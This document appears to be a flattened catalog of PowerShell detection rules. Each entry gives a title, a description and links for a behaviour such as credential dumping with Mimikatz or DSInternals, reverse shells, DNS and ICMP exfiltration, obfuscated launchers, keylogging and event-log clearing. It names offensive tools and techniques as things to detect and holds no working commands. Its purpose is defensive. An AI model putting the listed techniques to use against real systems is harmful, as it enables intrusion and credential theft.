Create Volume Shadow Copy with Powershell Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information https://attack.mitre.org/datasources/DS0005/, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7
Powershell Detect Virtualization Environment Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md, https://techgenix.com/malicious-powershell-scripts-evade-detection/
DirectorySearcher Powershell Exploitation Enumerates Active Directory to determine computers that are joined to the domain https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher
Manipulation of User Computer or Group Security Principals Across AD Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain.. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell, https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0
Disable Powershell Command History Detects scripts or commands that disabled the Powershell command history by removing psreadline module https://twitter.com/DissectMalware/status/1062879286749773824
Disable-WindowsOptionalFeature Command PowerShell Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
Potential In-Memory Execution Using Reflection.Assembly Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50
Potential COM Objects Download Cradles Usage - PS Script Detects usage of COM objects that can be abused to download files in PowerShell by CLSID https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57
DSInternals Suspicious PowerShell Cmdlets - ScriptBlock Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
Dump Credentials from Windows Credential Manager With PowerShell Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md
Enable Windows Remote Management Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2
Potential Suspicious Windows Feature Enabled Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server
Enumerate Credentials from Windows Credential Manager With PowerShell Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md
Disable of ETW Trace - Powershell Detects usage of powershell cmdlets to disable or remove ETW trace sessions https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
Suspicious PowerShell Mailbox SMTP Forward Rule Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule. https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Certificate Exported Via PowerShell - ScriptBlock Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
Suspicious FromBase64String Usage On Gzip Archive - Ps Script Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
Service Registry Permissions Weakness Check Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4
Active Directory Computers Enumeration With Get-AdComputer Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory. https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md
Active Directory Group Enumeration With Get-AdGroup Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Suspicious Get-ADReplAccount The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. https://www.powershellgallery.com/packages/DSInternals, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount
Automated Collection Bookmarks Using Get-ChildItem PowerShell Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md
Security Software Discovery Via Powershell Script Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell
HackTool - Rubeus Execution - ScriptBlock Detects the execution of the hacktool Rubeus using specific command line flags https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus
HackTool - WinPwn Execution - ScriptBlock Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team
PowerShell Hotfix Enumeration Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1
PowerShell ICMP Exfiltration Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp
Import PowerShell Modules From Suspicious Directories Detects powershell scripts that import modules from suspicious directories https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122
Execute Invoke-command on Remote Host Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4
Powershell DNSExfiltration DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh, https://github.com/Arno0x/DNSExfiltrator
Invoke-Obfuscation CLIP+ Launcher - PowerShell Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - Powershell Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - PowerShell Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - Powershell Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - Powershell Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - PowerShell Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - PowerShell Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Powershell Keylogging Adversaries may log user keystrokes to intercept credentials as the user types them. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1
Powershell LocalAccount Manipulation Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1
Suspicious PowerShell Mailbox Export to Share - PS Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Malicious PowerShell Commandlets - ScriptBlock Detects Commandlet names from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
Live Memory Dump Using Powershell Detects usage of a PowerShell command to dump the live memory of a Windows machine https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps
Malicious PowerShell Keywords Detects keywords from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921
Modify Group Policy Settings - ScriptBlockLogging Detect malicious GPO modifications can be used to implement many other malicious behaviors. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md
Powershell MsXml COM Object Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt, https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85), https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html
Malicious Nishang PowerShell Commandlets Detects Commandlet names and arguments from the Nishang exploitation framework https://github.com/samratashok/nishang
NTFS Alternate Data Stream Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
Code Executed Via Office Add-in XLL File Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md
Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock Detects the execution of powershell scripts with calls to the "Start-NetEventSession" cmdlet. Which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing, https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/7b8935fe4c82cb64d61343de1a8b2e38dd968534/handbooks/10_post_exploitation.md, https://github.com/forgottentq/powershell/blob/9e616363d497143dc955c4fdce68e5c18d28a6cb/captureWindows-Endpoint.ps1#L13
Potential Invoke-Mimikatz PowerShell Script Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords. https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script
PowerShell Web Access Installation - PsScript Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41
PowerView PowerShell Cmdlets - ScriptBlock Detects Cmdlet names from PowerView of the PowerSploit exploitation framework. https://powersploit.readthedocs.io/en/stable/Recon/README, https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon, https://thedfirreport.com/2020/10/08/ryuks-return, https://adsecurity.org/?p=2277
PowerShell Credential Prompt Detects PowerShell calling a credential prompt https://twitter.com/JohnLaTwC/status/850381440629981184, https://t.co/ezOTGy1a1G
PSAsyncShell - Asynchronous TCP Reverse Shell Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell https://github.com/JoelGMSec/PSAsyncShell
PowerShell PSAttack Detects the use of PSAttack PowerShell hack tool https://adsecurity.org/?p=2921
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
PowerShell Remote Session Creation Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4
PowerShell Script With File Hostname Resolving Capabilities Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries. https://www.fortypoundhead.com/showcontent.asp?artid=24022, https://labs.withsecure.com/publications/fin7-target-veeam-servers
Request A Single Ticket via PowerShell utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell
Root Certificate Installed - PowerShell Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
Suspicious Invoke-Item From Mount-DiskImage Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps
PowerShell Script With File Upload Capabilities Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md, https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4
PowerShell Script Change Permission Via Set-Acl - PsScript Detects PowerShell scripts set ACL to of a file or a folder https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
Powershell Sensitive File Discovery Detect adversaries enumerate sensitive files https://twitter.com/malmoeb/status/1570814999370801158
PowerShell Set-Acl On Windows Folder - PsScript Detects PowerShell scripts to set the ACL to a file in the Windows folder https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1
Change PowerShell Policies to an Insecure Level - PowerShell Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604
PowerShell ShellCode Detects Base64 encoded Shellcode https://twitter.com/cyb3rops/status/1063072865992523776
Malicious ShellIntel PowerShell Commandlets Detects Commandlet names from ShellIntel exploitation scripts. https://github.com/Shellntel/scripts/
Detected Windows Software Discovery - PowerShell Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts
Powershell Store File In Alternate Data Stream Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
Potential Persistence Via Security Descriptors - ScriptBlock Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project. https://github.com/HarmJ0y/DAMP
AD Groups Or Users Enumeration Using PowerShell - ScriptBlock Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Potential PowerShell Obfuscation Using Character Join Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation Internal Research
Suspicious Eventlog Clear Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs https://twitter.com/oroneequalsone/status/1568432028361830402, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
Powershell Directory Enumeration Detects technique used by MAZE ransomware to enumerate directories using Powershell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md, https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
Suspicious PowerShell Download - Powershell Script Detects suspicious PowerShell download command https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0
Powershell Execute Batch Script Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script
Troubleshooting Pack Cmdlet Execution Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS) https://twitter.com/nas_bench/status/1537919885031772161, https://lolbas-project.github.io/lolbas/Binaries/Msdt/
Extracting Information with PowerShell Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
PowerShell Get-Process LSASS in ScriptBlock Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
Suspicious GetTypeFromCLSID ShellExecute Detects suspicious Powershell code that execute COM Objects https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object
Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy, https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
Suspicious PowerShell Get Current User Detects the use of PowerShell to identify the current logged user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script
Suspicious GPO Discovery With Get-GPO Detect use of Get-GPO to get one GPO or all the GPOs in a domain. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps
Suspicious Process Discovery With Get-Process Get the processes that are running on the local computer. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4
Suspicious Hyper-V Cmdlets Adversaries may carry out malicious operations using a virtual instance to avoid detection https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine
Suspicious PowerShell Invocations - Generic Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious PowerShell Invocations - Specific Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious IO.FileStream Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md
Change User Agents with WebRequest Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
